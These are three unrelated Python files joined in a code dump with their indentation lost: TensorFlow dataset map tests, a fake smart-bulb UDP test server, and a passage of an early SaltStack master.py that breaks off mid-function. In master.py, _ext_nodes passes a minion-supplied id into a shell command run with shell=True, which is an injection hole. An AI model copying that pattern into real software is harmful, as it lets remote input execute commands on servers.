with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (contrib_dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = contrib_dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = contrib_dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
contrib_dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
contrib_dataset_ops.Dataset.range(100).map(_map_fn)
.prefetch(buffer_size_placeholder).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (
contrib_dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (
contrib_dataset_ops.Dataset.range(10).map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (
contrib_dataset_ops.Dataset.range(10).map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
contrib_dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureResourceInMapFn(self):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return contrib_dataset_ops.Dataset.range(10).map(_map_fn)
def _build_graph():
captured_iterator = contrib_dataset_ops.Dataset.range(
10).make_initializable_iterator()
ds = _build_ds(captured_iterator)
iterator = ds.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
return captured_iterator.initializer, init_op, get_next
with ops.Graph().as_default() as g:
captured_init_op, init_op, get_next = _build_graph()
with self.test_session(graph=g) as sess:
sess.run(captured_init_op)
sess.run(init_op)
for i in range(10):
self.assertEquals(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
class MapDatasetSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def setUp(self):
self._tensor_slice_len = 7
self._num_epochs = 14
self._num_outputs = self._tensor_slice_len * self._num_epochs
def _build_ds(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(self._num_epochs))
def testSaveRestoreCore(self):
self.run_core_tests(
self._build_ds,
lambda: self._build_ds(multiplier=15.0),
self._num_outputs)
def testSaveStatefulFunction(self):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(100).map(_map_fn)
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureVariableInMapFn(self):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1)))
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureConstantInMapFn(self):
def _build_ds():
constant_var = constant_op.constant(5)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda x: x + constant_var))
self.run_core_tests(_build_ds, None, 10)
def testCaptureDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
def testBuildDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return constant_op.constant(11000) + defun_fn_deep(math_ops.to_int32(x))
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
class ParallelMapDatasetSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def setUp(self):
self._tensor_slice_len = 7
self._num_epochs = 1
self._num_outputs = self._tensor_slice_len * self._num_epochs
def _build_ds(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=3).repeat(self._num_epochs))
def _build_ds_with_prefetch(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=3).repeat(self._num_epochs).prefetch(5))
def testSaveRestoreCore(self):
for ds_fn in [self._build_ds, self._build_ds_with_prefetch]:
self.run_core_tests(
ds_fn,
lambda: ds_fn(multiplier=15.0),
self._num_outputs)
def testSaveStatefulFunction(self):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(100).map(_map_fn)
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureVariableInMapFn(self):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1)))
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureConstantInMapFn(self):
def _build_ds():
constant_var = constant_op.constant(5)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda x: x + constant_var))
self.run_core_tests(_build_ds, None, 10)
def testCaptureDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
def testBuildDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return constant_op.constant(11000) + defun_fn_deep(math_ops.to_int32(x))
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
class IgnoreErrorsSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_ds(self, components):
return contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors())
def testIgnoreErrorsCore(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
diff_components = np.array([1., 2., 3., np.nan]).astype(np.float32)
num_outputs = 4
self.run_core_tests(lambda: self._build_ds(components),
lambda: self._build_ds(diff_components), num_outputs)
if __name__ == "__main__":
test.main()
|
fake_bulb.py
|
"""Start up a fake bulb to test features without a real bulb."""
import json
import socketserver
import threading
from typing import Any, Callable, Dict
def get_initial_pilot() -> Dict[str, Any]:
return {
"method": "getPilot",
"env": "pro",
"result": {
"mac": "ABCABCABCABC",
"rssi": -62,
"src": "",
"state": False,
"sceneId": 0,
"r": 255,
"g": 127,
"b": 0,
"c": 0,
"w": 0,
"temp": 0,
"dimming": 13,
},
}
def get_initial_sys_config() -> Dict[str, Any]:
return {
"method": "getSystemConfig",
"env": "pro",
"result": {
"mac": "a8bb5006033d",
"homeId": 653906,
"roomId": 989983,
"moduleName": "",
"fwVersion": "1.21.0",
"groupId": 0,
"drvConf": [20, 2],
"ewf": [255, 0, 255, 255, 0, 0, 0],
"ewfHex": "ff00ffff000000",
"ping": 0,
},
}
def get_initial_model_config() -> Dict[str, Any]:
return {
"method": "getModelConfig",
"env": "pro",
"result": {
"ps": 1,
"pwmFreq": 1000,
"pwmRange": [3, 100],
"wcr": 30,
"nowc": 1,
"cctRange": [2200, 2700, 4800, 6500],
"renderFactor": [171, 255, 75, 255, 43, 85, 0, 0, 0, 0],
},
}
BULB_JSON_ERROR = b'{"env":"pro","error":{"code":-32700,"message":"Parse error"}}'
class BulbUDPRequestHandlerBase(socketserver.DatagramRequestHandler):
"""Class for UDP handler."""
pilot_state: Dict[str, Any] # Will be set by constructor for the actual class
sys_config: Dict[str, Any] # Will be set by constructor for the actual class
model_config: Dict[str, Any] # Will be set by constructor for the actual class
def handle(self) -> None:
"""Handle the request."""
data = self.rfile.readline().strip()
print(f"Request:{data!r}")
try:
json_data: Dict[str, Any] = dict(json.loads(data.decode()))
except json.JSONDecodeError:
self.wfile.write(BULB_JSON_ERROR)
return
method = str(json_data["method"])
if method == "setPilot":
return_data = self.setPilot(json_data)
self.wfile.write(return_data)
elif method == "getPilot":
print(f"Response:{json.dumps(self.pilot_state)!r}")
self.wfile.write(bytes(json.dumps(self.pilot_state), "utf-8"))
elif method == "getSystemConfig":
self.wfile.write(bytes(json.dumps(self.sys_config), "utf-8"))
elif method == "getModelConfig":
self.wfile.write(bytes(json.dumps(self.model_config), "utf-8"))
else:
raise RuntimeError(f"No handler for {method}")
def setPilot(self, json_data: Dict[str, Any]) -> bytes:
"""Change the values in the state."""
for name, value in json_data["params"].items():
self.pilot_state["result"][name] = value
return b'{"method":"setPilot","env":"pro","result":{"success":true}}'
def make_udp_fake_bulb_server(module_name: str) -> socketserver.ThreadingUDPServer:
"""Configure a fake bulb instance."""
pilot_state = get_initial_pilot()
sys_config = get_initial_sys_config()
model_config = get_initial_model_config()
sys_config["result"]["moduleName"] = module_name
BulbUDPRequestHandler = type(
"BulbUDPRequestHandler",
(BulbUDPRequestHandlerBase,),
{
"pilot_state": pilot_state,
"sys_config": sys_config,
"model_config": model_config,
},
)
udp_server = socketserver.ThreadingUDPServer(
server_address=("127.0.0.1", 38899),
RequestHandlerClass=BulbUDPRequestHandler,
)
return udp_server
def startup_bulb(module_name: str = "ESP01_SHRGB_03") -> Callable[[], Any]:
"""Start up the bulb. Returns a function to shut it down."""
server = make_udp_fake_bulb_server(module_name)
thread = threading.Thread(target=server.serve_forever)
thread.start()
return server.shutdown
|
master.py
|
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import fnmatch
import signal
import shutil
import stat
import logging
import hashlib
import datetime
import pwd
import getpass
import resource
import subprocess
import multiprocessing
# Import third party libs
import zmq
import yaml
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.utils
import salt.fileserver
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler
from salt.exceptions import SaltMasterError
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(('Process did not die with terminate(): {0}'
.format(proc.pid)))
os.kill(signal.SIGKILL, proc.pid)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
class MasterExit(SystemExit):
'''
Named exit exception for the master process exiting
'''
pass
class SMaster(object):
'''
Create a simple salt-master, this will generate the top level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
users = []
keys = {}
acl_users = set(self.opts['client_acl'].keys())
if self.opts.get('user'):
acl_users.add(self.opts['user'])
acl_users.add(getpass.getuser())
for user in pwd.getpwall():
users.append(user.pw_name)
for user in acl_users:
log.info(
'Preparing the {0} key for local communication'.format(
user
)
)
cumask = os.umask(191)
if not user in users:
log.error('ACL user {0} is not available'.format(user))
continue
keyfile = os.path.join(
self.opts['cachedir'], '.{0}_key'.format(user)
)
if os.path.exists(keyfile):
log.debug('Removing stale keyfile: {0}'.format(keyfile))
os.unlink(keyfile)
key = salt.crypt.Crypticle.generate_key_string()
with salt.utils.fopen(keyfile, 'w+') as fp_:
fp_.write(key)
os.umask(cumask)
os.chmod(keyfile, 256)
try:
os.chown(keyfile, pwd.getpwnam(user).pw_uid, -1)
except OSError:
# The master is not being run as root and can therefore not
# chown the key file
pass
keys[user] = key
return keys
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
The clean old jobs function is the geenral passive maintinance process
controller for the Salt master. This is where any data that needs to
be cleanly maintained from the master is maintained.
'''
jid_root = os.path.join(self.opts['cachedir'], 'jobs')
search = salt.search.Search(self.opts)
last = int(time.time())
fileserver = salt.fileserver.Fileserver(self.opts)
runners = salt.loader.runner(self.opts)
schedule = salt.utils.schedule.Schedule(self.opts, runners)
while True:
now = int(time.time())
loop_interval = int(self.opts['loop_interval'])
if self.opts['keep_jobs'] != 0 and (now - last) >= loop_interval:
cur = '{0:%Y%m%d%H}'.format(datetime.datetime.now())
for top in os.listdir(jid_root):
t_path = os.path.join(jid_root, top)
for final in os.listdir(t_path):
f_path = os.path.join(t_path, final)
jid_file = os.path.join(f_path, 'jid')
if not os.path.isfile(jid_file):
continue
with salt.utils.fopen(jid_file, 'r') as fn_:
jid = fn_.read()
if len(jid) < 18:
# Invalid jid, scrub the dir
shutil.rmtree(f_path)
elif int(cur) - int(jid[:10]) > self.opts['keep_jobs']:
shutil.rmtree(f_path)
if self.opts.get('search'):
if now - last > self.opts['search_index_interval']:
search.index()
try:
if not fileserver.servers:
log.error('No fileservers loaded, The master will not be'
'able to serve files to minions')
raise SaltMasterError('No fileserver backends available')
fileserver.update()
except Exception as exc:
log.error(
'Exception {0} occured in file server update'.format(exc)
)
try:
schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if schedule.loop_interval < loop_interval:
loop_interval = schedule.loop_interval
except Exception as exc:
log.error(
'Exception {0} occured in scheduled job'.format(exc)
)
try:
time.sleep(loop_interval)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.warning(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.warning('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.warning(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
def start(self):
'''
Turn on the master server components
'''
log.info(
'salt-master is starting as user \'{0}\''.format(getpass.getuser())
)
enable_sigusr1_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(('Caught signal {0}, stopping the Salt Master'
.format(signum)))
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, 1)
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, 1)
pub_sock.setsockopt(zmq.RCVHWM, 1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
pull_sock.bind(pull_uri)
# Restrict access to the socket
os.chmod(
os.path.join(self.opts['sock_dir'],
'publish_pull.ipc'),
448
)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
pub_sock.send(package)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
finally:
if context.closed is False:
context.term()
class ReqServer(object):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle))
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
if self.clients.closed is False:
self.clients.setsockopt(zmq.LINGER, 1)
self.clients.close()
if self.workers.closed is False:
self.workers.setsockopt(zmq.LINGER, 1)
self.workers.close()
if self.context.closed is False:
self.context.term()
# Also stop the workers
for worker in self.work_procs:
if worker.is_alive() is True:
worker.terminate()
def __del__(self):
self.destroy()
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# Properly handle EINTR from SIGUSR1
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
# Changes here create a zeromq condition, check with thatch45 before
# making any zeromq changes
except KeyboardInterrupt:
socket.close()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an aes key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
return self.aes_funcs.run_func(data['cmd'], data)
def run(self):
'''
Start a Master Worker
'''
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Create the tops dict for loading external top data
self.tops = salt.loader.tops(self.opts)
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False)
self.__setup_fileserver()
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = fs_.serve_file
self._file_hash = fs_.file_hash
self._file_list = fs_.file_list
self._file_list_emptydirs = fs_.file_list_emptydirs
self._dir_list = fs_.dir_list
self._file_envs = fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as err:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, err))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError, err:
log.error('Unable to decrypt token: {0}'.format(err))
log.error('Salt minion claiming to be {0} has attempted to'
'communicate with the master and could not be verified'
.format(id_))
return False
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
if not 'id' in load:
log.error('Received call for external nodes without an id')
return {}
ret = {}
# The old ext_nodes method is set to be deprecated in 0.10.4
# and should be removed within 3-5 releases in favor of the
# "master_tops" system
if self.opts['external_nodes']:
if not salt.utils.which(self.opts['external_nodes']):
log.error(('Specified external nodes controller {0} is not'
' available, please verify that it is installed'
'').format(self.opts['external_nodes']))
return {}
cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id'])
ndata = yaml.safe_load(
subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE
).communicate()[0])
if 'environment' in ndata:
env = ndata['environment']
else:
env = 'base'
if 'classes' in ndata:
if isinstance(ndata['classes'], dict):
ret[env] = list(ndata['classes'])
